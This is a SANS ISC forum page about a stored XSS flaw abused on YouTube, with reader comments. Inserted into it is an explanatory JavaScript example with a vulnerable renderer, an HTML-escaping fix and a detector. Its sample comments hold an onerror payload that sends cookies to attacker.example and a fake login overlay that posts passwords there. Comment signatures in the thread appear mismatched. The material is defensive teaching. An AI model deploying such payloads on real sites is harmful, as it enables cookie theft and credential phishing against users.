
SANS ISC: Stored XSS vulnerability on YouTube actively abused? - Internet Security | DShield SANS ISC InfoSec Forums


Stored XSS vulnerability on YouTube actively abused?

XSS vulnerabilities are often underestimated, but they can sometimes be extremely dangerous. It looks as if a couple of hours ago attackers started exploiting what appears to be a stored XSS vulnerability on YouTube.

I don't want to go into details on how to exploit it until YouTube fixes it, but it does look fairly widespread already. So far, all the exploits I've seen just insert some benign HTML and amount to comment spam, but since this appears to be a full-fledged vulnerability, things could get out of control easily unless it is fixed.

What could an attacker do? They could steal your YouTube cookies, which probably doesn't mean much to them, but they could also post arbitrary JavaScript that will execute in your browser in the context of YouTube. I've seen nasty XSS attacks used to fake entire login screens, and we know how many people reuse the same password across multiple accounts.

We'll keep you informed on the development of this.

--
Bojan
INFIGO IS
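To make the "stored" part concrete, here is an added example (not code from the diary, and not YouTube's code; the comment records, the attacker host attacker.example and the function names are all constructed for illustration). A comment-rendering sink that concatenates stored user text into HTML lets an event-handler payload and a fake login overlay reach every visitor; HTML-entity encoding the user-controlled values for the element-content context neutralises both. A small detector counts how many rendered comments still carry non-template markup.

```javascript
// Added example, not from the ISC diary: a stored-XSS rendering sink and its
// hardened form. All records and hostnames below are constructed samples.

// Comments as they would sit in a database. "Stored" XSS means the payload is
// persisted server-side and rendered to every visitor, unlike reflected XSS.
const storedComments = [
  { user: 'alice', body: 'Great video!' },
  // Event-handler payload: no <script> tag, so naive tag stripping misses it.
  // It would ship document.cookie to the attacker's host (hypothetical).
  { user: 'mallory', body: `<img src=x onerror="fetch('https://attacker.example/?c='+encodeURIComponent(document.cookie))">` },
  // Fake login prompt drawn over the page. HttpOnly cookies do not help here:
  // the victim types the password into the attacker's form.
  { user: 'mallory2', body: `<div style="position:fixed;top:0;left:0;width:100%;height:100%;background:#fff">Session expired. <form action="https://attacker.example/login">Password: <input name=p type=password></form></div>` },
];

// Vulnerable: user text is concatenated straight into the HTML fragment.
function renderCommentVulnerable(c) {
  return `<li><b>${c.user}</b>: ${c.body}</li>`;
}

// Hardened: every user-controlled value is entity-encoded for the
// element-content context before insertion. (Attribute, URL and script
// contexts need their own, different encoders.)
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, ch => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[ch]);
}

function renderCommentSafe(c) {
  return `<li><b>${escapeHtml(c.user)}</b>: ${escapeHtml(c.body)}</li>`;
}

// Crude detector for the demo: the template itself only emits <li> and <b>,
// so any other tag, or an on* handler inside a tag, is attacker-controlled
// markup that survived rendering.
const TEMPLATE_TAGS = new Set(['li', '/li', 'b', '/b']);
function containsInjectedMarkup(html) {
  const tags = [...html.matchAll(/<\s*(\/?[a-zA-Z][a-zA-Z0-9]*)/g)]
    .map(m => m[1].toLowerCase());
  return tags.some(t => !TEMPLATE_TAGS.has(t)) || /<[^>]*\son[a-z]+\s*=/i.test(html);
}

// How many stored comments still carry live markup after rendering.
function countInjected(render) {
  return storedComments.map(render).filter(containsInjectedMarkup).length;
}

console.log('vulnerable page, comments with injected markup:', countInjected(renderCommentVulnerable));
console.log('hardened page, comments with injected markup:', countInjected(renderCommentSafe));
console.log(renderCommentSafe(storedComments[1]));
```

Two things the example is meant to show. First, the cookie-theft payload and the fake login screen are the same bug with different goals, and only the first is blunted by an HttpOnly flag on the session cookie; the hardened renderer is what stops both. Second, output encoding has to match the context: the escaper above is correct for text between tags, but a value dropped into an attribute, a URL or inline script needs a context-specific encoder, which is exactly where such filters tend to fail.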

How will this impact users who use their Google accounts to log in to YouTube? Sure, your YouTube cookies don't mean an awful lot, but I'd assume the Google Accounts (being linked to Gmail addresses) are a more valuable target? Or would these cookies not be sufficient to compromise an account?
Anonymous
There is no impact to Google accounts. If you steal YouTube cookies you won't be able to access any other Google hosted stuff since it's in a different domain and the SSO system in place relies on the main google.com domain.
Bojan (ISC Handler)
Many people have their credentials in their browser. XSS can extract those easily.
Bojan
Now that the vulnerability has been patched, could you go into more detail about it?
Bojan
I also want to know the details of the XSS attack code.
drwx
Guess this proves what Microsoft has shown us over the last few years: errors are human and will always exist. Holistic web security should include web filters that verify content before it is handled by the application servers...
drwx
The update and explanation given here are quite good. There is another article describing the technical details of this attack: http://tinyurl.com/36j8wdh
drwx
